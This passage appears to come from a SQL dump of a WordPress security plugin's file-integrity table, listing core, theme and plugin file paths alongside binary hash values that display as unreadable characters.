7\Z��ɮ','',0,'?'),('B�@�R*G�xF4N}','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/XSalsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\'�_�?Sş\Z]�y�','�6��[-�,9YR�r�\rY\"-��an�6$�','',0,'?'),('C�N.�[�`�6�\Z~','wp-content/themes/square/images/bg.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(kwR0��o�meu\'}�','�R\ZO0�?v=MC�=;O�	TRG�\0�Eer�tD','',0,'?'),('G���$�7O�9','wp-content/themes/sg-window/img/icons/small/myspace.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"b;DÁ�4���p\n�','[��/��aO񳣃t�\r<ӤQrg����a���','',0,'?'),('R�\\�&��T	�|`','wp-includes/class-wp-user.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Dj�)i%;�M�؉�','\"<q��|J�ʣB�b���+Bv�x!6Í�j�','',0,'?'),('d�;�m�/ղ�\Z�','wp-content/themes/relia/templates/page-no_sidebar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','F�Kj#^�作�m}�','-����i��*�yM��d>Z�6y\\�i0\nϑ�','',0,'?'),('e��-��{�Aa�$��','wp-content/themes/travelify/library/font/Genericons.ttf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�&tw�4�Љ�pc�$','���;��=LV|,8�Tg0W�N�QA@kC@���','',0,'?'),('o?!ψ��Λp�<�','wp-content/plugins/wordpress-seo/frontend/class-opengraph.php',0,'!�z.>x�R�J��&','!�z.>x�R�J��&','T��kj��\nW)����‰�WFI��W�R','',0,'?'),('pD�0�~Ҍw��$��','wp-content/themes/fluida/includes/loop.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','({pkZx`�9v}�M��','��;��k9\\c¼;�����v�pOYҥ:NX_�]o','',0,'?'),('ynm�;�/�UsK	��','wp-includes/css/wp-embed-template-ie.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7{WP�L�{H���I�','\\aWq1��+��Я�o�L�Y\0�„K���%<','',0,'?'),('z���D�>��A�)�a','wp-content/plugins/wordpress-seo/inc/wpseo-functions.php',0,'�:���[Vr����','�:���[Vr����','�Oy���������������XR�& ��','',0,'?'),('|�&;�r�Ls5��','wp-admin/includes/comment.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�I|��lu�D�','�� \r���B�%�F�V}[�j�7CF�A�','',0,'?'),('���Ye�.�0s��','wp-admin/includes/class-wp-comments-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�o�Kt�Jr�\"�-*�','7�d�i}k�4��+)�[��-L�4�uR_O�<Ѩ�','',0,'?'),('�A�o\r�ZԔ_�t','wp-content/plugins/wordfence/views/waf/waf-uninstall.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��~�xT-4�ZK��3','�>|k��\\~/n8�	9��i�+vT��[s','',0,'?'),('����+*��5���\'�','wp-content/themes/sg-window/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*#\r����5��z��W8','�IO.�J����o�ޞ&���5�AO�Uq4�','',0,'?'),('�z�De7���WS�6�','wp-content/themes/sg-window/publication/js/skip-link-focus-fix.js',0,'ʪ�$�n؊u��(�k�','ʪ�$�n؊u��(�k�','I�>�$bC�]�Z�}p��!j�	�˩9\\ݟ�','',0,'?'),('��\'-�p�-��f�','wp-admin/css/l10n-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','xmǏ|�s���A�',']��%FL�\nI�L��l���f426G��\'��','',0,'?'),('��$�/�D�?g�','wp-content/themes/fluida/front-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Źn���\n�d;��%3��','�2�{ghn�@_�<���C�娾+�p\Z�5�r�','',0,'?'),('��j�ֹJ����0Y','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/X25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p�0W\"F)����8O�','�5���)&��BoK]���ػ��rm`%��h�O','',0,'?'),('�Ÿ<�M��LQ)�=','wp-content/themes/nirvana/admin/js/widgets.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=���.��L�','Q��E9�,�\Z�H�%K�J�J���3���j�bJA','',0,'?'),('�Q%rT>�!�e_zE��','wp-content/themes/twentytwentyone/inc/back-compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j��Տ,;�\"��]&�','\'�ߍ���\0�`q���ֶp�~�r�I�{��','',0,'?'),('��<�¶В*��b�D','wp-content/themes/lightly/template-parts/content-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�0Y�2�_�!��','a��F`T\n���h���5mm��#����w','',0,'?'),('ܑ«_:o�T~@)>M','wp-content/themes/hueman/assets/global/oldBrowserCompat.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','s�4\ZzƉ�:	�/�]k','[���u+߭gݠ�=�����{h旑R','',0,'?'),('�\"�<	i�t��&�','wp-admin/css/colors/modern/colors.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��X�̯��R�j�F�','24�ރ�ki<��u&�*��7�U�s��=~��F�','',0,'?'),('�5�r�[��q��f3','wp-content/plugins/unyson/framework/includes/option-types/addable-option/view.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��7|�e����K�','���{w��?����K\"�7Q��|D���~b�','',0,'?'),('�\rC\06�û�m?j','wp-content/plugins/unyson/framework/includes/option-types/image-picker/static/js/image-picker/imagesloaded.pkg.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!�\\cl�E�eO�G','3���E$	`�\0h���;�?����`ȷ!�V�','',0,'?'),('���(4�Z�?� )�i','wp-content/plugins/unyson/framework/includes/option-types/range-slider/static/libs/ion-range-slider/ion.rangeSlider.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*�B���!;q=��8','�u�#F�\Z`1�^\"=�2a�p �[|�h\Z5i�','',0,'?'),('26�NxU�Lw�eGJ','wp-content/themes/relia/inc/fonts/fontawesome-webfont.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','߰/�m�	�X��h��','��raӧ�0G���n��cL]s׫�:��wHJ�','',0,'?'),('��L�KP�1�0L�\\','wp-content/themes/hueman/assets/front/img/demo/12-160x160.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')\0�WHQ� u^�w�9j','���k�m\"��O#�h����V���t<�H�L%','',0,'?'),('ܷ޸�q)�{kvm','wp-content/themes/skt-construction-lite/images/icon-gp.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��G��S\nM�MG ͚�','ͬ��,-is�h�\0~�Xd�Jd��xR^�d� }N/','',0,'?'),('9�k�ɽ �JZ��<','wp-content/themes/twentytwenty/searchform.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4�G�I\"�+����','�����C��eĻ�3�q�9qR�0�a�J�','',0,'?'),('L����5M�SYK��','wp-content/plugins/wordpress-seo/admin/formatter/class-term-metabox-formatter.php',0,'-�n\Z-:�R?��','-�n\Z-:�R?��','S\r�c�^��ۮ�z �U��B��(�<ҙC','',0,'?'),('L��bP�-I׭1f�','wp-includes/theme-compat/header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�s��<w�!��1','q�2�յ��Ϣ>r�7Nj��	D�^��A5\r','',0,'?'),('N�d#R��+��r\0s[','wp-content/plugins/wordfence/views/reports/activity-report.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��?ue�wD�:��E�','��ζ�\Z��)v���vG��,�h�/�ӈ�','',0,'?'),('Z��b�̀f*�GG�)`','wp-content/plugins/unyson/framework/includes/option-types/map/static/js/scripts.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�~�im�;k����','wD��ĝ{����b�X!k��L�����(��/','',0,'?'),('^�����;�DY\r0R','wp-content/themes/twentyseventeen/inc/color-patterns.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�P���[<���\0;*.;�','����z/��q�M�Z�&�Ǥ\rF��=��?�b�','',0,'?'),('_z��n�i�\\�1���','wp-content/themes/mh-magazine-lite/languages/nl_NL.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�I��e�Ȋp�3*��?\0','�|0�ϫ�Vٹ����)�X��}_=�C@u','',0,'?'),('e#�\\�ʬE3�(�9(','wp-content/themes/morfeu/assets/js/polyfill/respond.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p��c/?����n�','�T�h���m���IA�n��X�+Q�G�LF','',0,'?'),('p����)0�L}�C@}�','wp-content/plugins/unyson/framework/includes/option-types/date-picker/static/js/locales/bootstrap-datepicker.pt-BR.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','؞V��{�%�Я�3c��','@ފ\rO����2������Q{�\Z�жԶ�','',0,'?'),('t������!�\Z�%\n','wp-content/plugins/wordfence/vendor/composer/autoload_namespaces.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5�,}vĨ3��G��)�','E�r4@\0�ԡ$��z�3�$l��\Z�`i�ex�l�','',0,'?'),('{�~��rb�\\B��%�','wp-content/plugins/wordfence/css/dt_table.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�gJbj�J��9�k:�','o[P�HyЊ}���iGc�~��<c�D�R:D�','',0,'?'),('�L��\"�G�ʄ/\nN�','wp-admin/images/privacy.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ҟ�ݘ���ӽ�}�','qO.���x&��*p���@��l����Β/k','',0,'?'),('�{��Y�\\�z錿�}c','wp-includes/images/smilies/rolleyes.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' ���O�2�Ofݣi�','fK�)�\n�d��!]\r)��\\}���זl�^��','',0,'?'),('��+�Hs��DW\r','wp-content/themes/relia/template-parts/content-single.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','������gԖi�xЏ','��[�#\0ŭ=���xQ_Ӯ�F�Ët�f:���N\r','',0,'?'),('�1�v���(o򗂧','wp-content/plugins/all-in-one-wp-security-and-firewall/lib/whois/whois.fr.php',0,'wZ:�%<�S��}0�6�g','wZ:�%<�S��}0�6�g','���n�ݝ�.7��H,��ol�I�QǤ;�J��|','',0,'?'),('���-� ��\"\"F6','wp-content/themes/twentytwenty/classes/class-twentytwenty-non-latin-languages.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�^<�|%z�A�M�U<�','���ҟ�q�v@, C�1�4�-����zd,�P�','',0,'?'),('��7�)�����Y�','wp-content/themes/travelify/languages/tr_TR.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4\'�i��pU>`��B�{','L�Sq� \0����;�;~���\"���\"�!�B�','',0,'?'),('��TL �Yʒ���\ZO','wp-content/themes/hueman/assets/front/fonts/titillium-regular-webfont.eot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��/K*hT�����@','��k�8X+���xو���К�7\Z��7�k3�','',0,'?'),('�?�\0��l����.�','wp-includes/class-wp-application-passwords.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�X���.d�<t��~','��r�T�b�\\����	f���c������~��:!�','',0,'?'),('�2p)��t��I��','wp-content/plugins/wordfence/modules/login-security/classes/model/settings/db.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' ���\0�\">y>=����','xVQ/}�琾:(3&���%�U��Jo��C','',0,'?'),('�����o�Rb��','wp-includes/js/dist/url.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��}F�Κ֍�p��','|��%����9a)܏#��S���U��?N���','',0,'?'),(' \0�\0�h�1WP�f۽','wp-content/themes/supernews/acmethemes/customizer/feature-section/feature-panel.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','׽�U+\\ʬ[/��|','Kw��2 ��ѐ@و/j�\"ACb�Ѧ�����z�','',0,'?'),(' �0�=Q���X','wp-content/themes/precious-lite/languages/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Jӝ�_�X!!�','��2y���TWb��4!d�\n[�!L1*�ė��','',0,'?'),(' ��/��+M�Q�|�|.','wp-content/themes/lightly/template-parts/content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����ǙG�:��;�?','{��(���m��#\"�rA(��~\\�=z����','',0,'?'),(' \n�i\Z��s��\r','wp-content/themes/fabulous-fluid/images/grid-img12.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','H���*D��3���','���0B>�R��dǤܪ��\0�D;#Xk!�','',0,'?'),(' ?2WiD�cFk��','wp-content/themes/illdy/layout/images/blog/blog-header.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��n�zc����13','�H��S>Z�ٰ��UO���%�{V�u\0ðO&�','',0,'?'),(' \r�Һ3�qz��D���\r','wp-content/themes/accelerate/inc/admin/class-accelerate-admin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Z=�L\r�_����','�G��Q\Z�l/��a���b�X3�t2i��ҲZ�s�','',0,'?'),(' �es(N^���+q�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/autoload-phpunit.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2�MEƱ��(����(','E��a�\r�f U�DLb�V�ҪW#s�s��','',0,'?'),(' \'���_U;0�/<�','wp-admin/includes/class-bulk-theme-upgrader-skin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u�:y�x1s)����','�Ϲ���ݶ1SXCTڼ�<�ڊh`���V','',0,'?'),(' *@ADғ�=pu���E','wp-admin/user-new.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���W2#	�3�','8庹���R0H����m�я�Ȯ�Я&m','',0,'?'),(' 5d=�lዂWMc','wp-content/plugins/unyson/framework/core/components/extensions/manager/static/img/thumbnails/index.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ُ\0��	��B~','��B�����șo�$\'�A�d��L���xR�U','',0,'?'),(' 5��rD�g�籃�','wp-content/plugins/wordfence/views/dashboard/options-group-license.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','IT�愭��,�;_','��@��q��>G�C�|�U��sC��p���','',0,'?'),(' <@�s����\r��F��/','wp-includes/Requests/Exception/HTTP/305.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X��\0�K��/`�,��&','H�Ǝ����+@�I���b��^=�QvM6_iL','',0,'?'),(' AM[J�w�N�Q��','wp-content/themes/point/inc/plugin-activation.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'9\0v������۔','���Dy�ʦ��2�JV�BB���dc�G�Lm��','',0,'?'),(' V4��\r��:�V1�Z�','wp-content/themes/nirvana/images/nivoslider/arrows.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(�Z�<�`ƨ@��_&�','k�rv`�\r_���]��\ZW�Bv�=M>�\"�wI��','',0,'?'),(' V��K+�L\Z*!���','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-admin-init.php',0,'��(z�qޖCz۔�','��(z�qޖCz۔�','�,�/�Ԩ��X�J�E��B\Z�diR�','',0,'?'),(' Yq���vǥ{�g��J','wp-content/themes/nirvana/admin/images/schemes/Mid Nightmare.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R�ޝ�:���v)�,2�m','e+����<mΨ��r؈�P%9n�f��آ�','',0,'?'),(' [�,��_N6�m��^','wp-content/themes/aqueduct/languages/aqueduct.pot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��(S�3��A��','[���h���u�X�����W1H�W�a��	)$','',0,'?'),(' ���=����g�V�|�','wp-content/themes/twentytwenty/inc/template-tags.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�xM�ɞx���x�','���/�Ç�:�&�s�ۃu ���^&H','',0,'?'),(' �G�ʴ��Gtؑ��','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/BLAKE2b.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Oū3�(	ia�Y���(','����%��\Z0b��[u�#�v.�_��	O�=0','',0,'?'),(' �z�z{����L��H','wp-includes/rest-api/endpoints/class-wp-rest-blocks-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^�\"3R0������','��z�m1��xJ �g�Ь�xs�sIѻ˸�2','',0,'?'),(' �7=��4���#�N�','wp-content/plugins/wordpress-seo/admin/class-yoast-dashboard-widget.php',0,'���s����q+��','���s����q+��','�[�~�H��+�ӧ�V{ǚ�u�xg�ưC','',0,'?'),(' �\r$	Q�^C(����','wp-includes/Requests/Exception/HTTP/505.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�]A	3�[/Cd���','��⭛� i�{�PA�͆k���d���M\n���','',0,'?'),(' ��=�HM.��c�_','wp-content/themes/vega/assets/fonts/FontAwesome.otf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']���)�/��%W�>','׈>*�M�<�L8�C��C<h[���}�,�','',0,'?'),(' ��c̫)I�\np,͑��','wp-includes/css/jquery-ui-dialog-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�0�K����j���','�w�Ȧ>ϕ�l�$Vmר�0c�=R�6_I�50m#','',0,'?'),(' �q\0���N+=��?�','wp-content/themes/alpha-store/woocommerce.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R�\\��\r����e{Z�',')C+Y}���޹�\r6Yf1ì�8]�w��lW)K�','',0,'?'),('!o�\r��A��v7��e','wp-admin/update.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��t&���V�݁6�ָ','mcT)��Ҝ�O>y�n/@i\"+�5dJ��@���','',0,'?'),('!!�I�:�B�ߞ�-','wp-content/themes/hueman/functions/czr/controls/class-modules-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����p��$wA/ҟ#*�','Ri10;�|�AG�E�\'���\0�kn	�$x,at�','',0,'?'),('!#\"Z�}�	�����$','wp-content/themes/alpha-store/languages/cs_CZ.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q��x���>N�51','�}�1�������.ػQfB;�F���`��r�','',0,'?'),('!)kQan���奔�f','wp-content/themes/nirvana/fonts/ubuntu-b-webfont.eot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�b�kC����k�*��','�6�7�{\0ܐ����WD�1�2̻���ɖ�\\�;','',0,'?'),('!1b݅9��*�\\��','wp-admin/admin-footer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��R��#�ttIrzX�K','Vo�梌>�)�x����Z���EB�O��','',0,'?'),('!>[���e�Y����','wp-content/plugins/spam-captcha/core/lang/SL_framework-ja_JP.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y���$7�A��7���r','�MM�j�r�-xډ���bf�\\�1�ĊX�N','',0,'?'),('!A�Fʈ�Y�X�J','wp-content/themes/aqueduct/img/carousel-thumbnail.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q�$򚍜P���<^e{>','Z��� �ƬR)��o�]Yw엚Ŗ��]���|�','',0,'?'),('!H��8�@)���S}��','wp-content/plugins/spam-captcha/core/lang/SL_framework-nb_NO.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����k�7�$O','�\"w�`x,w#\r��H`�+9�n���i�\\	$ˁ�3','',0,'?'),('!I�d]5$���[��~�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/ChaCha20/Ctx.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o��L�� k\'k1��','��1�\\�Qt�*���J���%���s��&','',0,'?'),('!O߮eYn���^�ٛ','wp-content/themes/nirvana/fonts/sourcesanspro-bold-webfont.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z�8�,�D�	<��|�','�]F5�ǟ��O�x�\Z����4��y濡�/���','',0,'?'),('!Plu6�������CZ','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Salsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����P���e��1','T���*��+���z]ʜ;>�\n�3���]?x�','',0,'?'),('!_��輵p3p�n��L','wp-includes/images/smilies/icon_eek.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�/I ���x�)�(\"��','�8�����K҇���4������!��:ʰ','',0,'?'),('!gD��柟v�\"�P;��','wp-content/plugins/spam-captcha/core/browser.class.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~B,�N����DHT','���B�xӸڂtF�\"7R���h:�$�p�&R�&/','',0,'?'),('!|(�y�W�*1Oo2Cu','wp-includes/js/wp-api.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@�BY�f��b�b2�lз','�N�_���R\"T������%i�c��ő�	2&�H','',0,'?'),('!��7����,�ȷ\'�','wp-content/plugins/unyson/framework/extensions/backups/includes/module/tasks/class--fw-ext-backups-task-register.php',0,'d�B�?�Y�\\�Sn�','d�B�?�Y�\\�Sn�','��(�t�q��-\0’W+���RB1-ñ���&�>\0','',0,'?'),('!��xx�+!���[�(','wp-includes/js/dist/list-reusable-blocks.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���3E�a��ݜ-�','R�қ��I�ԡ��̿�I�VX�ָ��hy','',0,'?'),('!����W٤�\"��@�','wp-content/themes/sg-window/img/icons/linkedin.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�m�W��bl���G\\2','�@F\"4%�I����g�숦g0������l','',0,'?'),('!�߇v��T�����/','wp-content/plugins/unyson/framework/includes/customizer/class--fw-customizer-setting-option.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�D��}�����}��','��U�]�;\n�#�V\\�e͍s�J�ݳ�D���1��','',0,'?'),('!�w<���A\n�@�O','wp-includes/js/dist/hooks.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ǡ�=�8.j~����','4�+9��f���Vy�!�g=Z�:ca�4}���','',0,'?'),('!��~�0�����4�U','wp-content/themes/fabulous-fluid/js/source/jquery.sidr.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�``\ZZj���,��','���u/���s����$\r���Ua�J��\Z','',0,'?'),('!��y��\'U��b��#}','wp-content/plugins/wordfence/views/waf/options-group-rate-limiting.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�zY��衆:��Lk','3`R<��!���0)B��W�gH�Z��','',0,'?'),('!�##sw:\rH*�$q�','wp-content/plugins/wordfence/lib/menu_tools_diagnostic.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T�u$�j�6�uwq�t�','�r\"��(�-w�a$A�2\"�7��\\��Vb�','',0,'?'),('!����n1�����','wp-content/plugins/contact-form-7/languages/contact-form-7-hi_IN.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�v�;\0<�:�iGr��c',';��\0_ǹ��H�����*E�z�������','',0,'?'),('!�H�`�7k8^6T��','wp-content/plugins/unyson/framework/includes/option-types/date-picker/static/js/locales/bootstrap-datepicker.id.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','w��\r\"k��y�B<k�','G�1�x��ޤH�{�\\�F�T�n�J6:��Ŗ�','',0,'?'),('!��⋶��Z]��n-','wp-includes/block-patterns/quote.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','c�:�v,^8^����\"�}','����@��]y�%U?�vw�Xl�^�{q�','',0,'?'),('!��\')�qM*�Xc','wp-includes/blocks/embed/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����b�&v��-kz','^����9���_I�͵\nN\"�.�7���|_�X','',0,'?'),('!����������5�H','wp-content/plugins/unyson/framework/core/components/extensions/manager/static/img/thumbnails/analytics.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','c��0@c/�i{���','���;-���	�I��J�V��͐M�0%��c�!','',0,'?'),('!�R���p�nL�w�m7','wp-includes/js/tinymce/plugins/lists/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')�r?�N�ぼI��q\'�','%�=r������d��v\n��i�z�x�u��)3p','',0,'?'),('!ہ�Iǵ�`��8�t','wp-includes/js/dist/keyboard-shortcuts.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#�O�څB/�O!Ϭf�','u�1u\n/��/��<fjb\r���j�~r�ٷuj��','',0,'?'),('!߬�vg1�IV|�E�','wp-content/themes/twentytwentyone/assets/sass/05-blocks/tag-clould/_editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[<��ԉ1��-�3��','�wB��;\\q\\�8�N�!��-�X����!��\n','',0,'?'),('!�q��1��	cQƲ','wp-content/themes/hueman/option-tree/ot-loader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��V��T_�{Y�N','�?W&/���rcM�;�ڞ���a�؂�����','',0,'?'),('!�Tۦ����	l�I�\n','wp-content/plugins/wordfence/lib/menu_tools_importExport.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�~�E��jk��Z:q�','�z�+e<OkM�Δ��t���	��q��hW�','',0,'?'),('!���A+j�\"���','wp-content/themes/morfeu/assets/fonts/bootstrap/glyphicons-halflings-regular.eot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�v���tf�e�9� F�','t��a±�\0ӫ�I�D�v2u��\0���+�T�','',0,'?'),('!�>лӊ^��[��U}�','wp-includes/js/dist/data-controls.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':#��H�y�%AK2�F','��\\b�8�4�$lmy�Z\0�=����1�>a','',0,'?'),('!�O�4�bCRR�fO�','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/storage/file.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R����͡�RI0��[','�Ӆ�_3�:��þAs�N���0*Y�g�5�','',0,'?'),('!��Y0-z1�dm>�','wp-admin/js/plugin-install.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a���sP�2Z�6�w�','Ow��x���i� �T����/��\Z�`$&�','',0,'?'),('\"Et�y�s����\Z|g','wp-includes/js/tinymce/plugins/wptextpattern/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E	��-N�o����','�L�I‘�™Y�ow�)�4!:�;?��','',0,'?'),('\"�m]������=[* ,','wp-content/themes/accelerate/no-results.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','G�;�Xٓ@��;���','�҄�8��dx���m��K�<\n1~��I��J�','',0,'?'),('\"\nt��(��u4��3','wp-content/themes/fabulous-fluid/fonts/fontawesome-webfont.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�W ����C�~O�E�s','/ن}���W��^�z��&�;tةIY-�y-�.','',0,'?'),('\"(}G��r�	0��V(','wp-admin/ms-options.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~<�b�s�\'�+�\Z�Q','q�J��R�_+�V�C%�~d���35k��x��','',0,'?'),('\"-�Ѳ\n2�j%�(o','wp-content/themes/twentynineteen/sass/layout/_layout.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!�&�\"��{����#*�','���v���@.|���s>0�O���A3jA���','',0,'?'),('\"0�rN1M���#���','wp-content/plugins/wordfence/vendor/composer/autoload_classmap.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�EӤ㭇��M��g��','Q��*\'���B�+E��ߞ��:��m��yu�W','',0,'?'),('\"2Sz��?���U,?','wp-content/themes/fabulous-fluid/inc/featured-slider.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����X��|9V(<�\\','^e��ȱiR5����P��&��5����\r68�','',0,'?'),('\"4\"-;���P�cuadb','wp-content/plugins/spam-captcha/core/img/arrow_down.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\Z�բ�1L�Jm�:','�]}}Q���ϸ�fi)��ˆ&:�b���+�n�','',0,'?'),('\"8A\n=��ᇼfp5','wp-includes/theme-compat/embed-404.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7�[R+S��A-\Za*e','�}�pN�\0�K��6�%),�o��`�)�1\08','',0,'?'),('\"IFn����@�a�}�9','wp-admin/includes/class-wp-themes-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o6����n+66��n���','\\AY�Q�ۂ�|�